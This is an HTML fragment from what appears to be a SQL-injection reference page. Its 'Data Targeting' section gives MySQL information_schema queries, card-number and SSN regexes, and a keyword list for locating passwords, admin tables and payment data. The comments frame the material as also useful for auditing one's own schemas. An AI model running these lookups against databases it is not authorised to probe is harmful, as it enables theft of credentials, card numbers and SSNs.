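<h3 id="data-targeting">Data Targeting</h3>
<!-- The intro text is rendered by Liquid from site.data.injectionDescriptions.dataTargeting. -->
<p class="pageDescription">{{site.data.injectionDescriptions.dataTargeting}}</p>
<h3 id="data-targeting-queries">Data Targeting queries</h3>
<!--
  Queries that locate sensitive data through information_schema metadata.
  The bold fragment in each row is the search term to substitute.
  String literals are written with single quotes and column aliases with
  straight double quotes, so each statement parses when pasted into a
  MySQL client (typographic quotes are not SQL quote characters).
  information_schema lists only objects the connected account holds some
  privilege on, so least-privilege grants bound what these lookups return.
  The same statements serve a data-discovery audit of one's own schemas.
-->
<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th scope="col">Description</th>
      <th scope="col" align="left">Query</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Database sizes</td>
      <td>SELECT table_schema "Database Name",sum( data_length + index_length ) / 1024 / 1024 "Database Size in MB",sum( data_free )/ 1024 / 1024 "Free Space in MB" FROM information_schema.TABLES GROUP BY table_schema ;</td>
    </tr>
    <tr>
      <td>Database name keyword</td>
      <td>SELECT table_schema "Database Name" FROM information_schema.TABLES WHERE table_schema LIKE '<strong>%passwords%</strong>' GROUP BY table_schema ;</td>
    </tr>
    <tr>
      <td>Table name keyword</td>
      <td>SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema NOT LIKE 'information_schema' AND table_name LIKE '<strong>%admin%</strong>';</td>
    </tr>
    <tr>
      <td>Column name keyword</td>
      <td>SELECT column_name, table_name FROM information_schema.columns WHERE column_name LIKE '<strong>%password%</strong>';</td>
    </tr>
    <tr>
      <!-- credit_cards / cc_number look like example names; the pattern matches a 16-digit value that starts with 4. -->
      <td>Column data regex</td>
      <td>SELECT * from credit_cards WHERE cc_number REGEXP '<strong>^4[0-9]{15}$</strong>';</td>
    </tr>
  </tbody>
</table>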
<h3 id="data-targeting-regexes">Data Targeting regexes</h3>
<!--
  Patterns for recognising payment card numbers and SSNs in column data.
  NOTE(review): both patterns use \d and the card pattern uses (?:...) groups.
  MySQL's REGEXP accepts these from 8.0.4 onward (ICU engine); earlier releases
  use a POSIX engine that does not. Inside a MySQL string literal a single
  backslash is dropped under the default SQL mode, so \d has to be written
  \\d or replaced with [0-9].
  A match is only a candidate: the SSN pattern accepts any nine digits, and
  card matches need a Luhn check before they are treated as real card numbers.
-->
<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th>Description</th>
      <th align="left">Regex</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>All major credit card providers</td>
      <td>^(?:4[0-9]{12}(?:[0-9]{3})?|(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|6(?:011|5[0-9]{2})[0-9]{12}|(?:2131|1800|35\d{3})\d{11})$</td>
    </tr>
    <tr>
      <td>Unmasked | Masked SSN</td>
      <td>^(\d{3}-?\d{2}-?\d{4}|XXX-XX-XXXX)$</td>
    </tr>
  </tbody>
</table>
<h3 id="data-targeting-keywords">Data Targeting keywords</h3>
<!--
  Search terms for schema, table and column names; presumably substituted for
  the bold fragment in the keyword queries on this page (confirm).
  Short terms such as "pin" and "pan" also match unrelated names, for example
  "shipping" or "company", when wrapped in % wildcards, so results need filtering.
-->
<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th>Keyword</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>credit</td>
    </tr>
    <tr>
      <td>card</td>
    </tr>
    <tr>
      <td>pin</td>
    </tr>
    <tr>
      <td>cvv</td>
    </tr>
    <tr>
      <td>pan</td>
    </tr>
    <tr>
      <td>password</td>
    </tr>
    <tr>
      <td>social</td>
    </tr>
    <tr>
      <td>ssn</td>
    </tr>
    <tr>
      <td>account</td>
    </tr>
    <tr>
      <td>confidential</td>
    </tr>
  </tbody>
</table>